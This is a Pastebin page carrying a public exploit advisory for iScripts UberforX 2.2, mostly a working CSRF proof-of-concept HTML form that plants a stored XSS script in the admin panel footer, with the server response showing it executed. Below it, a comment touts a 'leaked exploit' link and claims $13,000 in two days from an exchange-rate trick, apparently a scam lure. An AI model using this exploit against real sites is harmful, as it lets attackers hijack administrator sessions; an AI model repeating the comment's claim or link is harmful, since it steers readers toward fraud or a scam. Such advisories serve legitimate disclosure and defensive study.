ManhNho

CVE-2018-10136 & CVE-2018-10137

Apr 16th, 2018
8,008
0
Never
12
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.89 KB | None | 0 0
  1. # Exploit title: iScripts UberforX 2.2 - CSRF & Stored XSS in Admin Panel
  2. # Date: 16/04/2018
  3. # Exploit Author: ManhNho
  4. # Vendor Homepage: https://www.iscripts.com
  5. # Software Link: https://www.iscripts.com/uberforx/
  6. # Demo Link: https://www.demo.iscripts.com/uberforx/demo/cms
  7. # Version: 2.2
  8. # CVE: Pending...
  9. # Tested on: Windows 10 / Kali Linux
  10. # Category: Webapps
  11.  
  12.  
  13. #1. Description
  14. -----------------------------------------------------
  15. iScripts UberforX 2.2 - CSRF & Stored XSS via "manage_settings" section in Admin Panel.
  16.  
  17. #2. PoC
  18. -----------------------------------------------------
  19. a) Send below crafted request to logged in user who is having Root Administrator level access
  20.  
  21. <html>
  22. <!-- CSRF PoC - ManhNho -->
  23. <body>
  24. <script>history.pushState('', '', '/')</script>
  25. <form action="https://www.demo.iscripts.com/uberforx/demo/cms?section=manage_settings&action=edit&id=2" method="POST">
  26. <input type="hidden" name="id" value="2" />
  27. <input type="hidden" name="cms&#95;set&#95;name" value="admin&#95;copyright" />
  28. <input type="hidden" name="cms&#95;set&#95;value" value="&lt;script&gt;alert&#40;&apos;1&apos;&#41;&lt;&#47;script&gt;" />
  29. <input type="hidden" name="submit" value="Save" />
  30. <input type="submit" value="Submit request" />
  31. </form>
  32. </body>
  33. </html>
  34.  
  35. b) Once the logged in user opens the URL the form will get submitted with active session of root administrator and action get performed successfully.
  36. Website will popup alert '1'
  37.  
  38. Response:
  39.  
  40. HTTP/1.1 200 OK
  41. Date: Mon, 16 Apr 2018 07:44:55 GMT
  42. Server: Apache
  43. Expires: Thu, 19 Nov 1981 08:52:00 GMT
  44. Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  45. Pragma: no-cache
  46. Connection: close
  47. Content-Type: text/html
  48. Content-Length: 28359
  49. ...
  50. </div>
  51. <div class="footer row-fluid">
  52. <p class="muted"><small><script>alert('1')</script></small></p>
  53. </div>
  54. ...
Advertisement
Comments
  • emblok
    158 days
    # CSS 0.78 KB | 0 0
    1. ✅ Leaked Exploit Documentation:
    2.  
    3. https://rawtext.host/raw?44lh4m
    4.  
    5. This made me $13,000 in 2 days.
    6.  
    7. Important: If you plan to use the exploit more than once, remember that after the first successful swap you must wait 24 hours before using it again. Otherwise, there is a high chance that your transaction will be flagged for additional verification, and if that happens, you won't receive the extra 38% — they will simply correct the exchange rate.
    8. The first COMPLETED transaction always goes through — this has been tested and confirmed over the last days.
    9.  
    10. Edit: I've gotten a lot of questions about the maximum amount it works for — as far as I know, there is no maximum amount. The only limit is the 24-hour cooldown (1 use per day without any verification from Swapzone — instant swap).
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
Add Comment
Please, Sign In to add comment